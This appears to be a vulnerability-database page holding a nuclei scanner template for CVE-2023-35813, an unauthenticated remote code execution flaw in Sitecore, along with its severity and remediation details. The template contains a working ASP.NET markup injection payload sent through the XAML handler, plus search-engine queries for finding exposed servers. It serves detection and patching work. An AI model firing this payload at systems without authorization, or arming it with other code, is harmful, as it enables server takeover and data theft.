Lucene search
K

Sitecore - Remote Code Execution

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 308 Views

Sitecore - Remote Code Execution affects Experience Manager, Platform, and Commerce through 10.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Sitecore - Remote Code Execution v8.2 Exploit
11 Mar 202400:00
zdt
GithubExploit
Exploit for Code Injection in Sitecore Experience_Commerce
30 Nov 202515:58
githubexploit
GithubExploit
Exploit for Code Injection in Sitecore Experience_Commerce
31 Dec 202305:23
githubexploit
GithubExploit
Exploit for Code Injection in Sitecore Experience_Commerce
15 Jan 202414:14
githubexploit
GithubExploit
Exploit for Code Injection in Sitecore Experience_Commerce
31 Dec 202305:23
githubexploit
ATTACKERKB
CVE-2023-35813
17 Jun 202323:15
attackerkb
Circl
CVE-2023-35813
26 Sep 202315:23
circl
CNNVD
Sitecore 安全漏洞
17 Jun 202300:00
cnnvd
CVE
CVE-2023-35813
17 Jun 202300:00
cve
Cvelist
CVE-2023-35813
17 Jun 202300:00
cvelist
Rows per page
id: CVE-2023-35813

info:
  name: Sitecore - Remote Code Execution
  author: DhiyaneshDk,iamnoooob
  severity: critical
  description: |
    Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.
  impact: |
    Unauthenticated attackers can execute arbitrary code on Sitecore servers through the XAML parser by injecting malicious ASP.NET markup, potentially compromising the entire content management system and accessing sensitive customer data.
  remediation: |
    Apply Sitecore security patches as outlined in KB1002979 for Experience Manager, Experience Platform, and Experience Commerce versions through 10.3.
  reference:
    - https://support.sitecore.com/kb?id=kb_article_view\u0026sysparm_article=KB1002979
    - https://code-white.com/blog/exploiting-asp.net-templateparser-part-1/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35813
    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1002979
    - https://github.com/BagheeraAltered/CVE-2023-35813-PoC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-35813
    cwe-id: CWE-22,CWE-23
    epss-score: 0.86685
    epss-percentile: 0.99716
    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sitecore
    product: experience_commerce
    shodan-query:
      - title:"Sitecore"
      - http.title:"sitecore"
    fofa-query: title="sitecore"
    google-query: intitle:"sitecore"
  tags: cve2023,cve,sitecore,rce,vkev,vuln
variables:
  string: "{{rand_base(6)}}"
  payload: |
    <%@Register
        TagPrefix = 'x'
        Namespace = 'System.Runtime.Remoting.Services'
        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
    %>
    <x:RemotingService runat='server'
        Context-Response-ContentType='{{string}}'
    />

http:
  - raw:
      - |
        POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl("{{url_encode(payload)}}")

    matchers:
      - type: dsl
        dsl:
          - contains(content_type, '{{string}}')
          - contains_all(body, 'commands', 'command', 'value')
          - status_code == 200
        condition: and
# digest: 4b0a004830460221008ae23ab6bfe4b6c1604eb0edaa53c676bc6df893223a633b4e62d9dd9da6266f022100d7e9a71fe8225ecbc3585caa8a945a1ea9cab427b35b60bc8e478c32ff4c408b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
EPSS0.86685
SSVC
308